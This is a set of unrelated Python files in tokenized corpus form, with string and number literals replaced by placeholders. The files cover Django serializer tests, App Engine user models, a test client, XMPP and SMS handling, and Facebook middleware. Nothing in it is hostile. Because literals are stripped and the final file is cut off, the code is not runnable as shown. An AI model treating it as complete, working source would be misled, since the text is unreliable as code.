( ) <EOL> instance . data_id = data <EOL> instance . save ( ) <EOL> return instance <EOL> def pk_create ( pk , klass , data ) : <EOL> instance = klass ( ) <EOL> instance . data = data <EOL> instance . save ( ) <EOL> return instance <EOL> def data_compare ( testcase , pk , klass , data ) : <EOL> instance = klass . objects . get ( id = pk ) <EOL> testcase . assertEqual ( data , instance . data , <EOL> "<STR_LIT>" % ( pk , data , type ( data ) , instance . data , type ( instance . data ) ) ) <EOL> def generic_compare ( testcase , pk , klass , data ) : <EOL> instance = klass . objects . get ( id = pk ) <EOL> testcase . assertEqual ( data [ <NUM_LIT:0> ] , instance . data ) <EOL> testcase . assertEqual ( data [ <NUM_LIT:1> : ] , [ t . data for t in instance . tags . all ( ) ] ) <EOL> def fk_compare ( testcase , pk , klass , data ) : <EOL> instance = klass . objects . get ( id = pk ) <EOL> testcase . 
assertEqual ( data , instance . data_id ) <EOL> def m2m_compare ( testcase , pk , klass , data ) : <EOL> instance = klass . objects . get ( id = pk ) <EOL> testcase . assertEqual ( data , [ obj . id for obj in instance . data . all ( ) ] ) <EOL> def o2o_compare ( testcase , pk , klass , data ) : <EOL> instance = klass . objects . get ( data = data ) <EOL> testcase . assertEqual ( data , instance . data_id ) <EOL> def pk_compare ( testcase , pk , klass , data ) : <EOL> instance = klass . objects . get ( data = data ) <EOL> testcase . assertEqual ( data , instance . data ) <EOL> data_obj = ( data_create , data_compare ) <EOL> generic_obj = ( generic_create , generic_compare ) <EOL> fk_obj = ( fk_create , fk_compare ) <EOL> m2m_obj = ( m2m_create , m2m_compare ) <EOL> o2o_obj = ( o2o_create , o2o_compare ) <EOL> pk_obj = ( pk_create , pk_compare ) <EOL> test_data = [ <EOL> ( data_obj , <NUM_LIT:1> , BooleanData , True ) , <EOL> ( data_obj , <NUM_LIT:2> , BooleanData , False ) , <EOL> ( data_obj , <NUM_LIT:10> , CharData , "<STR_LIT>" ) , <EOL> ( data_obj , <NUM_LIT:11> , CharData , "<STR_LIT>" ) , <EOL> ( data_obj , <NUM_LIT:12> , CharData , "<STR_LIT:None>" ) , <EOL> ( data_obj , <NUM_LIT> , CharData , "<STR_LIT:null>" ) , <EOL> ( data_obj , <NUM_LIT> , CharData , "<STR_LIT>" ) , <EOL> ( data_obj , <NUM_LIT:15> , CharData , None ) , <EOL> ( data_obj , <NUM_LIT:20> , DateData , datetime . date ( <NUM_LIT> , <NUM_LIT:6> , <NUM_LIT:16> ) ) , <EOL> ( data_obj , <NUM_LIT> , DateData , None ) , <EOL> ( data_obj , <NUM_LIT:30> , DateTimeData , datetime . 
datetime ( <NUM_LIT> , <NUM_LIT:6> , <NUM_LIT:16> , <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT> ) ) , <EOL> ( data_obj , <NUM_LIT> , DateTimeData , None ) , <EOL> ( data_obj , <NUM_LIT> , EmailData , "<STR_LIT>" ) , <EOL> ( data_obj , <NUM_LIT> , EmailData , None ) , <EOL> ( data_obj , <NUM_LIT:50> , FileData , '<STR_LIT>' ) , <EOL> ( data_obj , <NUM_LIT> , FileData , None ) , <EOL> ( data_obj , <NUM_LIT> , FilePathData , "<STR_LIT>" ) , <EOL> ( data_obj , <NUM_LIT> , FilePathData , None ) , <EOL> ( data_obj , <NUM_LIT> , FloatData , <NUM_LIT> ) , <EOL> ( data_obj , <NUM_LIT> , FloatData , - <NUM_LIT> ) , <EOL> ( data_obj , <NUM_LIT> , FloatData , <NUM_LIT:0.0> ) , <EOL> ( data_obj , <NUM_LIT> , FloatData , None ) , <EOL> ( data_obj , <NUM_LIT> , IntegerData , <NUM_LIT> ) , <EOL> ( data_obj , <NUM_LIT> , IntegerData , - <NUM_LIT> ) , <EOL> ( data_obj , <NUM_LIT> , IntegerData , <NUM_LIT:0> ) , <EOL> ( data_obj , <NUM_LIT> , IntegerData , None ) , <EOL> ( data_obj , <NUM_LIT> , IPAddressData , "<STR_LIT:127.0.0.1>" ) , <EOL> ( data_obj , <NUM_LIT> , IPAddressData , None ) , <EOL> ( data_obj , <NUM_LIT:100> , NullBooleanData , True ) , <EOL> ( data_obj , <NUM_LIT> , NullBooleanData , False ) , <EOL> ( data_obj , <NUM_LIT> , NullBooleanData , None ) , <EOL> ( data_obj , <NUM_LIT> , PhoneData , "<STR_LIT>" ) , <EOL> ( data_obj , <NUM_LIT> , PhoneData , None ) , <EOL> ( data_obj , <NUM_LIT> , PositiveIntegerData , <NUM_LIT> ) , <EOL> ( data_obj , <NUM_LIT> , PositiveIntegerData , None ) , <EOL> ( data_obj , <NUM_LIT> , PositiveSmallIntegerData , <NUM_LIT:12> ) , <EOL> ( data_obj , <NUM_LIT> , PositiveSmallIntegerData , None ) , <EOL> ( data_obj , <NUM_LIT> , SlugData , "<STR_LIT>" ) , <EOL> ( data_obj , <NUM_LIT> , SlugData , None ) , <EOL> ( data_obj , <NUM_LIT> , SmallData , <NUM_LIT:12> ) , <EOL> ( data_obj , <NUM_LIT> , SmallData , - <NUM_LIT:12> ) , <EOL> ( data_obj , <NUM_LIT> , SmallData , <NUM_LIT:0> ) , <EOL> ( data_obj , <NUM_LIT> , SmallData , None ) , <EOL> ( 
data_obj , <NUM_LIT> , TextData , """<STR_LIT>""" ) , <EOL> ( data_obj , <NUM_LIT> , TextData , "<STR_LIT>" ) , <EOL> ( data_obj , <NUM_LIT> , TextData , None ) , <EOL> ( data_obj , <NUM_LIT> , TimeData , datetime . time ( <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT> ) ) , <EOL> ( data_obj , <NUM_LIT> , TimeData , None ) , <EOL> ( data_obj , <NUM_LIT> , USStateData , "<STR_LIT>" ) , <EOL> ( data_obj , <NUM_LIT> , USStateData , None ) , <EOL> ( data_obj , <NUM_LIT> , XMLData , "<STR_LIT>" ) , <EOL> ( data_obj , <NUM_LIT> , XMLData , None ) , <EOL> ( generic_obj , <NUM_LIT:200> , GenericData , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> ( generic_obj , <NUM_LIT> , GenericData , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> ( data_obj , <NUM_LIT> , Anchor , "<STR_LIT>" ) , <EOL> ( data_obj , <NUM_LIT> , Anchor , "<STR_LIT>" ) , <EOL> ( fk_obj , <NUM_LIT> , FKData , <NUM_LIT> ) , <EOL> ( fk_obj , <NUM_LIT> , FKData , <NUM_LIT> ) , <EOL> ( fk_obj , <NUM_LIT> , FKData , None ) , <EOL> ( m2m_obj , <NUM_LIT> , M2MData , [ ] ) , <EOL> ( m2m_obj , <NUM_LIT> , M2MData , [ <NUM_LIT> , <NUM_LIT> ] ) , <EOL> ( m2m_obj , <NUM_LIT> , M2MData , [ <NUM_LIT> , <NUM_LIT> ] ) , <EOL> ( m2m_obj , <NUM_LIT> , M2MData , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) , <EOL> ( o2o_obj , None , O2OData , <NUM_LIT> ) , <EOL> ( o2o_obj , None , O2OData , <NUM_LIT> ) , <EOL> ( fk_obj , <NUM_LIT> , FKSelfData , <NUM_LIT> ) , <EOL> ( fk_obj , <NUM_LIT> , FKSelfData , <NUM_LIT> ) , <EOL> ( fk_obj , <NUM_LIT> , FKSelfData , None ) , <EOL> ( m2m_obj , <NUM_LIT> , M2MSelfData , [ ] ) , <EOL> ( m2m_obj , <NUM_LIT> , M2MSelfData , [ ] ) , <EOL> ( m2m_obj , <NUM_LIT> , M2MSelfData , [ <NUM_LIT> , <NUM_LIT> ] ) , <EOL> ( m2m_obj , <NUM_LIT> , M2MSelfData , [ <NUM_LIT> , <NUM_LIT> ] ) , <EOL> ( m2m_obj , <NUM_LIT> , M2MSelfData , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) , <EOL> ( m2m_obj , <NUM_LIT> , M2MSelfData , [ ] ) , <EOL> ( m2m_obj , <NUM_LIT> , M2MSelfData , [ ] ) , 
<EOL> ( data_obj , <NUM_LIT> , Anchor , "<STR_LIT>" ) , <EOL> ( data_obj , <NUM_LIT> , Anchor , "<STR_LIT>" ) , <EOL> ( pk_obj , <NUM_LIT> , BooleanPKData , True ) , <EOL> ( pk_obj , <NUM_LIT> , BooleanPKData , False ) , <EOL> ( pk_obj , <NUM_LIT> , CharPKData , "<STR_LIT>" ) , <EOL> ( pk_obj , <NUM_LIT> , EmailPKData , "<STR_LIT>" ) , <EOL> ( pk_obj , <NUM_LIT> , FilePKData , '<STR_LIT>' ) , <EOL> ( pk_obj , <NUM_LIT> , FilePathPKData , "<STR_LIT>" ) , <EOL> ( pk_obj , <NUM_LIT> , FloatPKData , <NUM_LIT> ) , <EOL> ( pk_obj , <NUM_LIT> , FloatPKData , - <NUM_LIT> ) , <EOL> ( pk_obj , <NUM_LIT> , FloatPKData , <NUM_LIT:0.0> ) , <EOL> ( pk_obj , <NUM_LIT> , IntegerPKData , <NUM_LIT> ) , <EOL> ( pk_obj , <NUM_LIT> , IntegerPKData , - <NUM_LIT> ) , <EOL> ( pk_obj , <NUM_LIT> , IntegerPKData , <NUM_LIT:0> ) , <EOL> ( pk_obj , <NUM_LIT> , IPAddressPKData , "<STR_LIT:127.0.0.1>" ) , <EOL> ( pk_obj , <NUM_LIT> , NullBooleanPKData , True ) , <EOL> ( pk_obj , <NUM_LIT> , NullBooleanPKData , False ) , <EOL> ( pk_obj , <NUM_LIT> , PhonePKData , "<STR_LIT>" ) , <EOL> ( pk_obj , <NUM_LIT> , PositiveIntegerPKData , <NUM_LIT> ) , <EOL> ( pk_obj , <NUM_LIT> , PositiveSmallIntegerPKData , <NUM_LIT:12> ) , <EOL> ( pk_obj , <NUM_LIT> , SlugPKData , "<STR_LIT>" ) , <EOL> ( pk_obj , <NUM_LIT> , SmallPKData , <NUM_LIT:12> ) , <EOL> ( pk_obj , <NUM_LIT> , SmallPKData , - <NUM_LIT:12> ) , <EOL> ( pk_obj , <NUM_LIT> , SmallPKData , <NUM_LIT:0> ) , <EOL> ( pk_obj , <NUM_LIT> , USStatePKData , "<STR_LIT>" ) , <EOL> ] <EOL> class SerializerTests ( unittest . TestCase ) : <EOL> pass <EOL> def serializerTest ( format , self ) : <EOL> management . flush ( verbosity = <NUM_LIT:0> , interactive = False ) <EOL> objects = [ ] <EOL> transaction . enter_transaction_management ( ) <EOL> transaction . managed ( True ) <EOL> for ( func , pk , klass , datum ) in test_data : <EOL> objects . append ( func [ <NUM_LIT:0> ] ( pk , klass , datum ) ) <EOL> transaction . commit ( ) <EOL> transaction . 
leave_transaction_management ( ) <EOL> objects . extend ( Tag . objects . all ( ) ) <EOL> serialized_data = serializers . serialize ( format , objects , indent = <NUM_LIT:2> ) <EOL> management . flush ( verbosity = <NUM_LIT:0> , interactive = False ) <EOL> transaction . enter_transaction_management ( ) <EOL> transaction . managed ( True ) <EOL> for obj in serializers . deserialize ( format , serialized_data ) : <EOL> obj . save ( ) <EOL> transaction . commit ( ) <EOL> transaction . leave_transaction_management ( ) <EOL> for ( func , pk , klass , datum ) in test_data : <EOL> func [ <NUM_LIT:1> ] ( self , pk , klass , datum ) <EOL> for format in serializers . get_serializer_formats ( ) : <EOL> setattr ( SerializerTests , '<STR_LIT>' + format + '<STR_LIT>' , curry ( serializerTest , format ) ) </s>
"""App Engine datastore replacements for django.contrib.auth models.

Provides a User entity backed by the App Engine users service, plus
minimal Group/Message/Permission entities so code written against
django.contrib.auth keeps importing.
"""
from django.core import mail
from django.core.exceptions import ImproperlyConfigured
from django.db import models
from django.utils.encoding import smart_str
import urllib

from django.db.models.manager import EmptyManager

from google.appengine.api import users
from google.appengine.ext import db

from appengine_django.models import BaseModel


class User(BaseModel):
    """Datastore entity mirroring django.contrib.auth.models.User's API."""
    # The wrapped App Engine account; everything else mirrors Django's User.
    user = db.UserProperty(required=True)
    username = db.StringProperty(required=True)
    first_name = db.StringProperty()
    last_name = db.StringProperty()
    email = db.EmailProperty()
    password = db.StringProperty()
    is_staff = db.BooleanProperty(default=False, required=True)
    is_active = db.BooleanProperty(default=True, required=True)
    is_superuser = db.BooleanProperty(default=False, required=True)
    last_login = db.DateTimeProperty(auto_now_add=True, required=True)
    date_joined = db.DateTimeProperty(auto_now_add=True, required=True)
    # Group/permission relations are not supported; empty managers keep the
    # django.contrib.auth interface importable.
    groups = EmptyManager()
    user_permissions = EmptyManager()

    def __unicode__(self):
        return self.username

    def __str__(self):
        return unicode(self).encode('<STR_LIT:utf-8>')

    @classmethod
    def get_djangouser_for_user(cls, user):
        """Fetch the User entity for an App Engine account, creating and
        saving one (seeded from the account's email/nickname) if absent."""
        query = cls.all().filter("<STR_LIT>", user)
        if query.count() == <NUM_LIT:0>:
            django_user = cls(user=user, email=user.email(),
                              username=user.nickname())
            django_user.save()
        else:
            django_user = query.get()
        return django_user

    # Password management is delegated to the App Engine users service, so
    # Django's password API is deliberately unsupported.
    def set_password(self, raw_password):
        raise NotImplementedError

    def check_password(self, raw_password):
        raise NotImplementedError

    def set_unusable_password(self):
        raise NotImplementedError

    def has_usable_password(self):
        raise NotImplementedError

    def get_group_permissions(self):
        # Always empty: see user_permissions above.
        return self.user_permissions

    def get_all_permissions(self):
        return self.user_permissions

    def has_perm(self, perm):
        return False

    def has_perms(self, perm_list):
        return False

    def has_module_perms(self, module):
        return False

    def get_and_delete_messages(self):
        """Return this user's queued messages, deleting each as it is read."""
        msgs = []
        # NOTE(review): the flattened source loses indentation; deleting each
        # message inside the loop matches upstream appengine_django — confirm.
        for msg in self.message_set:
            msgs.append(msg)
            msg.delete()
        return msgs

    def is_anonymous(self):
        """Entities always represent signed-in accounts; never anonymous."""
        return False

    def is_authenticated(self):
        """Counterpart of is_anonymous(); always True for stored users."""
        return True

    def get_absolute_url(self):
        return "<STR_LIT>" % urllib.quote(smart_str(self.username))

    def get_full_name(self):
        full_name = u'<STR_LIT>' % (self.first_name, self.last_name)
        return full_name.strip()

    def email_user(self, subject, message, from_email):
        """Send an email to this user's stored address."""
        mail.send_mail(subject,
                       message,
                       from_email,
                       [self.email])

    def get_profile(self):
        """Return (and cache on the instance) the site-specific profile
        entity named by settings.AUTH_PROFILE_MODULE.

        Raises:
          SiteProfileNotAvailable: setting missing, model unresolvable,
            or no profile entity references this user.
        """
        from django.contrib.auth.models import SiteProfileNotAvailable
        if not hasattr(self, '<STR_LIT>'):
            from django.conf import settings
            if not hasattr(settings, "<STR_LIT>"):
                raise SiteProfileNotAvailable
            try:
                app_label, model_name = settings.AUTH_PROFILE_MODULE.split('<STR_LIT:.>')
                model = models.get_model(app_label, model_name)
                self._profile_cache = model.all().filter("<STR_LIT>", self).get()
                if not self._profile_cache:
                    raise model.DoesNotExist
            except (ImportError, ImproperlyConfigured):
                raise SiteProfileNotAvailable
        return self._profile_cache


class Group(BaseModel):
    """Minimal stand-in for django.contrib.auth Group."""
    name = db.StringProperty()
    permissions = EmptyManager()


class Message(BaseModel):
    """A queued message for a user; consumed by get_and_delete_messages()."""
    user = db.ReferenceProperty(User)
    message = db.TextProperty()


class Permission(BaseModel):
    """Minimal stand-in for django.contrib.auth Permission."""
    name = db.StringProperty()
<s> """<STR_LIT>""" <EOL> import httplib <EOL> import logging <EOL> import os <EOL> import unittest <EOL> import sys <EOL> import threading <EOL> from django import http <EOL> from django import test <EOL> from django . test import client <EOL> from django . conf import settings <EOL> from google . appengine . tools import dev_appserver <EOL> from google . appengine . tools import dev_appserver_login <EOL> PORT = <NUM_LIT> <EOL> ROOT_PATH = os . path . dirname ( os . path . dirname ( os . path . dirname ( __file__ ) ) ) <EOL> APP_ID = '<STR_LIT>' <EOL> LOGIN_URL = '<STR_LIT>' <EOL> def start_server ( root_path = ROOT_PATH , port = PORT , app_id = APP_ID ) : <EOL> dev_appserver . ApplicationLoggingHandler . InitializeTemplates ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> dev_appserver . SetupStubs ( app_id , <EOL> login_url = LOGIN_URL , <EOL> datastore_path = '<STR_LIT>' , <EOL> history_path = '<STR_LIT>' , <EOL> clear_datastore = False ) <EOL> server = dev_appserver . CreateServer ( ROOT_PATH , <EOL> LOGIN_URL , <EOL> port , <EOL> '<STR_LIT>' ) <EOL> server_thread = threading . Thread ( target = server . serve_forever ) <EOL> server_thread . setDaemon ( True ) <EOL> server_thread . start ( ) <EOL> return port <EOL> def RetrieveURL ( method , <EOL> host_port , <EOL> relative_url , <EOL> user_info = None , <EOL> body = None , <EOL> extra_headers = [ ] ) : <EOL> """<STR_LIT>""" <EOL> url_host = '<STR_LIT>' % host_port <EOL> logging . info ( '<STR_LIT>' , url_host ) <EOL> try : <EOL> connection = httplib . HTTPConnection ( url_host ) <EOL> logging . info ( '<STR_LIT>' , method , relative_url ) <EOL> try : <EOL> connection . putrequest ( method , relative_url ) <EOL> if user_info is not None : <EOL> email , admin = user_info <EOL> auth_string = '<STR_LIT>' % ( dev_appserver_login . COOKIE_NAME , <EOL> dev_appserver_login . CreateCookieData ( email , admin ) ) <EOL> logging . info ( '<STR_LIT>' , auth_string ) <EOL> connection . 
putheader ( '<STR_LIT>' , auth_string ) <EOL> if body is not None : <EOL> connection . putheader ( '<STR_LIT>' , len ( body ) ) <EOL> for key , value in extra_headers : <EOL> logging . info ( '<STR_LIT>' , str ( key ) , str ( value ) ) <EOL> connection . putheader ( str ( key ) , str ( value ) ) <EOL> connection . endheaders ( ) <EOL> if body is not None : <EOL> connection . send ( body ) <EOL> response = connection . getresponse ( ) <EOL> status = response . status <EOL> content = response . read ( ) <EOL> headers = dict ( response . getheaders ( ) ) <EOL> logging . info ( '<STR_LIT>' , status , content ) <EOL> return status , content , headers <EOL> finally : <EOL> connection . close ( ) <EOL> except ( IOError , httplib . HTTPException , socket . error ) , e : <EOL> logging . error ( '<STR_LIT>' , e ) <EOL> raise e <EOL> class AppEngineClientHandler ( client . ClientHandler ) : <EOL> def __init__ ( self , port ) : <EOL> super ( AppEngineClientHandler , self ) . __init__ ( ) <EOL> self . _port = port <EOL> self . _host = '<STR_LIT:localhost>' <EOL> def __call__ ( self , environ ) : <EOL> method = environ [ '<STR_LIT>' ] <EOL> host_port = ( self . _host , self . _port ) <EOL> relative_url = environ [ '<STR_LIT>' ] <EOL> if environ [ '<STR_LIT>' ] : <EOL> relative_url += '<STR_LIT>' % environ [ '<STR_LIT>' ] <EOL> body = environ [ '<STR_LIT>' ] . read ( environ . get ( '<STR_LIT>' , <NUM_LIT:0> ) ) <EOL> headers = [ ] <EOL> status , content , headers = RetrieveURL ( method , <EOL> host_port , <EOL> relative_url , <EOL> body = body , <EOL> extra_headers = headers ) <EOL> response = http . HttpResponse ( content = content , <EOL> status = status ) <EOL> for header , value in headers . iteritems ( ) : <EOL> response [ header ] = value <EOL> return response <EOL> class AppEngineClient ( client . Client ) : <EOL> def __init__ ( self , port , * args , ** kw ) : <EOL> super ( AppEngineClient , self ) . __init__ ( * args , ** kw ) <EOL> self . 
handler = AppEngineClientHandler ( port = port ) <EOL> class IntegrationTest ( test . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> port = start_server ( ) <EOL> self . gae_client = AppEngineClient ( port = port ) <EOL> def testBasic ( self ) : <EOL> """<STR_LIT>""" <EOL> rv = self . gae_client . get ( '<STR_LIT:/>' ) <EOL> self . assertEquals ( rv . status_code , <NUM_LIT:200> ) </s>
<s> import logging <EOL> from django . conf import settings as django_settings <EOL> from google . appengine . api import users <EOL> from common import component <EOL> from common import util <EOL> def settings ( request ) : <EOL> d = dict ( [ ( k , util . get_metadata ( k ) ) <EOL> for k in django_settings . get_all_members ( ) ] ) <EOL> return dict ( ** d ) <EOL> def components ( request ) : <EOL> return { '<STR_LIT>' : component } <EOL> def flash ( request ) : <EOL> if '<STR_LIT>' not in request . REQUEST : <EOL> return { } <EOL> flash = request . REQUEST [ '<STR_LIT>' ] <EOL> nonce = util . create_nonce ( None , flash ) <EOL> if nonce != request . REQUEST . get ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return { } <EOL> return { '<STR_LIT>' : flash } <EOL> def gaia ( request ) : <EOL> try : <EOL> gaia_user = users . GetCurrentUser ( ) <EOL> gaia_login = users . CreateLoginURL ( request . META [ '<STR_LIT>' ] ) <EOL> gaia_logout = users . CreateLogoutURL ( '<STR_LIT>' ) <EOL> except : <EOL> gaia_user = None <EOL> gaia_login = "<STR_LIT>" <EOL> gaia_logout = "<STR_LIT>" <EOL> return locals ( ) </s>
<s> import logging <EOL> import re <EOL> from django . conf import settings <EOL> from cleanliness import encoding <EOL> from common import component <EOL> from common . protocol import base <EOL> class JID ( object ) : <EOL> _re_jid = re . compile ( r'<STR_LIT>' ) <EOL> def __init__ ( self , node , host , resource = None ) : <EOL> self . node = node <EOL> self . host = host <EOL> self . resource = resource <EOL> @ classmethod <EOL> def from_uri ( cls , uri ) : <EOL> node , rest = uri . split ( '<STR_LIT:@>' , <NUM_LIT:1> ) <EOL> try : <EOL> host , rest = rest . split ( '<STR_LIT:/>' , <NUM_LIT:1> ) <EOL> resource = '<STR_LIT:/>' + rest <EOL> except ValueError : <EOL> host = rest <EOL> resource = '<STR_LIT:/>' <EOL> return cls ( node , host , resource ) <EOL> def base ( self ) : <EOL> return '<STR_LIT>' % ( self . node , self . host ) <EOL> def full ( self ) : <EOL> return '<STR_LIT>' % ( self . node , self . host , self . resource ) <EOL> class XmppMessage ( object ) : <EOL> sender = None <EOL> target = None <EOL> message = None <EOL> def __init__ ( self , sender , target , message ) : <EOL> self . sender = JID . from_uri ( sender ) <EOL> self . target = JID . from_uri ( target ) <EOL> self . message = message <EOL> @ classmethod <EOL> def from_request ( cls , request ) : <EOL> xmpp_service = component . best [ '<STR_LIT>' ] <EOL> return xmpp_service . from_request ( cls , request ) <EOL> class XmppConnection ( base . Connection ) : <EOL> def send_message ( self , to_jid_list , message , html_message = None , <EOL> atom_message = None ) : <EOL> if settings . IM_TEST_ONLY : <EOL> to_jid_list = [ x for x in to_jid_list <EOL> if x . base ( ) in settings . IM_TEST_JIDS ] <EOL> message = encoding . smart_str ( message ) <EOL> if html_message : <EOL> html_message = encoding . smart_str ( html_message ) <EOL> if atom_message : <EOL> atom_message = encoding . smart_str ( atom_message ) <EOL> xmpp_service = component . best [ '<STR_LIT>' ] <EOL> xmpp_service . 
send_message ( [ j . base ( ) for j in to_jid_list ] , <EOL> message , <EOL> html_message = html_message , <EOL> atom_message = atom_message ) </s>
<s> import logging <EOL> import re <EOL> from django . conf import settings <EOL> from django . core import mail <EOL> from common import api <EOL> from common import clean <EOL> from common import exception <EOL> from common import profile <EOL> from common import sms as sms_service <EOL> from common import util <EOL> from common . protocol import sms <EOL> from common . test import base <EOL> from common . test import util as test_util <EOL> class SmsTest ( base . FixturesTestCase ) : <EOL> sender = '<STR_LIT>' <EOL> target = settings . SMS_TARGET <EOL> def setUp ( self ) : <EOL> super ( SmsTest , self ) . setUp ( ) <EOL> self . service = sms_service . SmsService ( sms . SmsConnection ( ) ) <EOL> self . service . init_handlers ( ) <EOL> def receive ( self , message , sender = None , target = None ) : <EOL> if sender is None : <EOL> sender = self . sender <EOL> if target is None : <EOL> target = self . target <EOL> self . service . handle_message ( sender , target , message ) <EOL> self . exhaust_queue_any ( ) <EOL> outbox = sms . outbox [ : ] <EOL> sms . outbox = [ ] <EOL> return outbox <EOL> def assertOutboxContains ( self , outbox , pattern , sender = None ) : <EOL> if sender is None : <EOL> sender = self . sender <EOL> if type ( pattern ) is type ( '<STR_LIT>' ) : <EOL> pattern = re . compile ( pattern ) <EOL> for mobile , message in outbox : <EOL> if mobile == sender and pattern . search ( message ) : <EOL> return True <EOL> self . fail ( '<STR_LIT>' % ( pattern . pattern , outbox ) ) <EOL> def sign_in ( self , nick , sender = None ) : <EOL> password = self . passwords [ clean . nick ( nick ) ] <EOL> r = self . receive ( '<STR_LIT>' % ( nick , password ) , sender = sender ) <EOL> return r <EOL> def test_sign_in ( self ) : <EOL> nick = '<STR_LIT>' <EOL> password = self . passwords [ clean . nick ( nick ) ] <EOL> r = self . receive ( '<STR_LIT>' % ( nick , password ) ) <EOL> self . assertOutboxContains ( r , '<STR_LIT>' % ( util . 
get_metadata ( '<STR_LIT>' ) , nick ) ) <EOL> def test_sign_on ( self ) : <EOL> self . sign_in ( '<STR_LIT>' ) <EOL> r = self . receive ( '<STR_LIT>' ) <EOL> self . assertOutboxContains ( r , sms_service . HELP_SIGNED_OUT ) <EOL> r = self . receive ( '<STR_LIT>' ) <EOL> self . assertOutboxContains ( r , sms_service . HELP_SIGN_IN ) <EOL> def test_post_and_reply ( self ) : <EOL> unpop = '<STR_LIT>' <EOL> r = self . sign_in ( '<STR_LIT>' , sender = unpop ) <EOL> r = self . receive ( '<STR_LIT>' , sender = unpop ) <EOL> r = self . sign_in ( '<STR_LIT>' ) <EOL> r = self . receive ( '<STR_LIT>' ) <EOL> r = self . receive ( '<STR_LIT>' ) <EOL> self . assertOutboxContains ( r , '<STR_LIT>' , sender = unpop ) <EOL> r = self . receive ( '<STR_LIT>' , sender = unpop ) <EOL> self . assertOutboxContains ( r , '<STR_LIT>' ) <EOL> def test_whitelist ( self ) : <EOL> o = test_util . override ( SMS_MT_WHITELIST = re . compile ( '<STR_LIT>' ) ) <EOL> def _all_blocked ( ) : <EOL> r = self . sign_in ( '<STR_LIT>' ) <EOL> self . assertRaises ( exception . ServiceError , _all_blocked ) <EOL> r = self . sign_in ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assert_ ( r ) <EOL> o . reset ( ) <EOL> def test_blacklist ( self ) : <EOL> o = test_util . override ( SMS_MT_BLACKLIST = re . compile ( '<STR_LIT>' ) ) <EOL> def _all_blocked ( ) : <EOL> r = self . sign_in ( '<STR_LIT>' ) <EOL> self . assertRaises ( exception . ServiceError , _all_blocked ) <EOL> r = self . sign_in ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assert_ ( r ) <EOL> o . reset ( ) </s>
<s> """<STR_LIT>""" <EOL> from facebook import Facebook <EOL> __docformat__ = "<STR_LIT>" <EOL> try : <EOL> from paste . registry import StackedObjectProxy <EOL> from webob . exc import _HTTPMove <EOL> from paste . util . quoting import strip_html , html_quote , no_quote <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> facebook = StackedObjectProxy ( name = "<STR_LIT>" ) <EOL> class CanvasRedirect ( _HTTPMove ) : <EOL> """<STR_LIT>""" <EOL> title = "<STR_LIT>" <EOL> code = <NUM_LIT:200> <EOL> template = '<STR_LIT>' <EOL> def html ( self , environ ) : <EOL> """<STR_LIT>""" <EOL> body = self . make_body ( environ , self . template , html_quote , no_quote ) <EOL> return body <EOL> class FacebookWSGIMiddleware ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , app , config , facebook_class = Facebook ) : <EOL> """<STR_LIT>""" <EOL> self . app = app <EOL> self . config = config <EOL> self . facebook_class = facebook_class <EOL> def __call__ ( self , environ , start_response ) : <EOL> config = self . config <EOL> real_facebook = self . facebook_class ( config [ "<STR_LIT>" ] , <EOL> config [ "<STR_LIT>" ] ) <EOL> registry = environ . get ( '<STR_LIT>' ) <EOL> if registry : <EOL> registry . register ( facebook , real_facebook ) <EOL> environ [ '<STR_LIT>' ] = real_facebook <EOL> return self . app ( environ , start_response ) <EOL> try : <EOL> import pylons <EOL> from pylons . controllers . util import redirect_to as pylons_redirect_to <EOL> from routes import url_to <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> class PylonsFacebook ( Facebook ) : <EOL> """<STR_LIT>""" <EOL> def check_session ( self , request = None ) : <EOL> """<STR_LIT>""" <EOL> if request is None : <EOL> request = pylons . request <EOL> return Facebook . check_session ( self , request ) <EOL> def redirect_to ( self , url ) : <EOL> """<STR_LIT>""" <EOL> if self . 
in_canvas : <EOL> raise CanvasRedirect ( url ) <EOL> pylons_redirect_to ( url ) <EOL> def apps_url_for ( self , * args , ** kargs ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" + url_to ( * args , ** kargs ) <EOL> def create_pylons_facebook_middleware ( app , config ) : <EOL> """<STR_LIT>""" <EOL> return FacebookWSGIMiddleware ( app , config , <EOL> facebook_class = PylonsFacebook ) </s>
<s> """<STR_LIT>""" <EOL> __all__ = [ '<STR_LIT>' ] <EOL> import re <EOL> flags = ( re . DOTALL <EOL> | re . IGNORECASE <EOL> | re . VERBOSE <EOL> | re . UNICODE <EOL> ) <EOL> removed_re = re . compile ( r'''<STR_LIT>''' , flags ) <EOL> tag_expr = r'''<STR_LIT>''' <EOL> def tagMatcher ( tag_name , * close_tags ) : <EOL> if close_tags : <EOL> options = '<STR_LIT:|>' . join ( ( tag_name , ) + close_tags ) <EOL> closers = '<STR_LIT>' % ( options , ) <EOL> else : <EOL> closers = tag_name <EOL> expr = tag_expr % locals ( ) <EOL> return re . compile ( expr , flags ) <EOL> html_find = tagMatcher ( '<STR_LIT:html>' ) <EOL> head_find = tagMatcher ( '<STR_LIT>' , '<STR_LIT:body>' ) <EOL> link_find = re . compile ( r'<STR_LIT>' , flags ) <EOL> attr_find = re . compile ( r'''<STR_LIT>''' , flags ) <EOL> replacements = { <EOL> '<STR_LIT>' : '<STR_LIT:&>' , <EOL> '<STR_LIT>' : '<STR_LIT:<>' , <EOL> '<STR_LIT>' : '<STR_LIT:>>' , <EOL> '<STR_LIT>' : '<STR_LIT:">' , <EOL> } <EOL> ent_replace = re . compile ( r'<STR_LIT>' % '<STR_LIT:|>' . join ( replacements . keys ( ) ) ) <EOL> def replaceEnt ( mo ) : <EOL> "<STR_LIT>" <EOL> return replacements . get ( mo . group ( <NUM_LIT:1> ) , mo . group ( ) ) <EOL> def parseLinkAttrs 